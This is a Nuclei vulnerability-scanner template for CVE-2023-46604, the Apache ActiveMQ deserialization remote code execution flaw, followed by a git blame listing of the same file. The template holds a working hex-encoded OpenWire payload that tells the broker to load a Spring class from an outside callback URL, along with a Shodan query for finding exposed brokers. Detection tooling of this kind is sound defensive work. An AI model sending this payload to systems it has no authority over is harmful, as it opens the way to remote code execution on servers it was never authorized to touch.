nuclei-templates/network/cves/2023/CVE-2023-46604.yaml

id: CVE-2023-46604

info:
  name: Apache ActiveMQ - Remote Code Execution
  author: Ice3man,Mzack9999,pdresearch
  severity: critical
  description: |
    Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
    Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/10/27/5
    - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
    - https://github.com/X1r0z/ActiveMQ-RCE
    - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
    - https://paper.seebug.org/3058/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2023-46604
    cwe-id: CWE-502
    epss-score: 0.00053
  metadata:
    max-request: 1
    shodan-query: product:"ActiveMQ OpenWire Transport"
    verified: true
  tags: cve,cve2023,network,rce,apache,activemq,deserialization

variables:
  prefix: "1f00000000000000000001010042"
  classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
  final: "{{prefix}}{{classname}}"

tcp:
  - inputs:
      - data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}"

    host:
      - "{{Hostname}}"
    port: 61616

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
          - "http"

      - type: word
        words:
          - "ActiveMQ"
          - "StackTraceEnabled"
        condition: and
# digest: 4b0a00483046022100f363443cf43dcc6cfff466d9b2f2606a19f6366bf864994566b83a1b1a62b524022100886785b126a725f1ea5ff4295d1d61cfc9767f17a1a5de7d28c16744f15d1bfe:922c64590222798bb761d5b6d8e72950
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00			`id: CVE-2023-46604`

			`info:`
adding reference + tags 2023-11-02 19:15:17 +00:00			`name: Apache ActiveMQ - Remote Code Execution`
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00			`author: Ice3man,Mzack9999,pdresearch`
			`severity: critical`
adding reference + tags 2023-11-02 19:15:17 +00:00			`description: \|`
misc update 2023-11-02 18:42:42 +00:00			`Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.`
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00			`Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.`
			`reference:`
			`- http://www.openwall.com/lists/oss-security/2023/10/27/5`
			`- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt`
adding reference + tags 2023-11-02 19:15:17 +00:00			`- https://github.com/X1r0z/ActiveMQ-RCE`
			`- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog`
			`- https://paper.seebug.org/3058/`
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H`
			`cvss-score: 10`
			`cve-id: CVE-2023-46604`
			`cwe-id: CWE-502`
			`epss-score: 0.00053`
			`metadata:`
TemplateMan Update [Tue Nov 7 17:58:21 UTC 2023] :robot: 2023-11-07 17:58:22 +00:00			`max-request: 1`
			`shodan-query: product:"ActiveMQ OpenWire Transport"`
adding reference + tags 2023-11-02 19:15:17 +00:00			`verified: true`
Update CVE-2023-46604.yaml 2023-11-07 16:59:20 +00:00			`tags: cve,cve2023,network,rce,apache,activemq,deserialization`
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00
			`variables:`
			`prefix: "1f00000000000000000001010042"`
			`classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"`
			`final: "{{prefix}}{{classname}}"`

			`tcp:`
Update CVE-2023-46604.yaml 2023-11-02 18:45:36 +00:00			`- inputs:`
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00			`- data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}"`
Update and rename CVE-2023-46604.yaml to CVE-2023-46604.yaml 2023-11-07 17:20:12 +00:00
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00			`host:`
			`- "{{Hostname}}"`
Update and rename CVE-2023-46604.yaml to CVE-2023-46604.yaml 2023-11-07 17:20:12 +00:00			`port: 61616`
misc update 2023-11-02 18:42:42 +00:00
			`matchers-condition: and`
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00			`matchers:`
			`- type: word`
Update and rename CVE-2023-46604.yaml to CVE-2023-46604.yaml 2023-11-07 17:20:12 +00:00			`part: interactsh_protocol`
Create CVE-2023-46604.yaml 2023-11-02 18:32:27 +00:00			`- "http"`
misc update 2023-11-02 18:42:42 +00:00
			`- type: word`
			`words:`
			`- "ActiveMQ"`
			`- "StackTraceEnabled"`
			`condition: and`
Auto Template Signing [Tue Nov 7 18:39:31 UTC 2023] :robot: 2023-11-07 18:39:31 +00:00			`# digest: 4b0a00483046022100f363443cf43dcc6cfff466d9b2f2606a19f6366bf864994566b83a1b1a62b524022100886785b126a725f1ea5ff4295d1d61cfc9767f17a1a5de7d28c16744f15d1bfe:922c64590222798bb761d5b6d8e72950`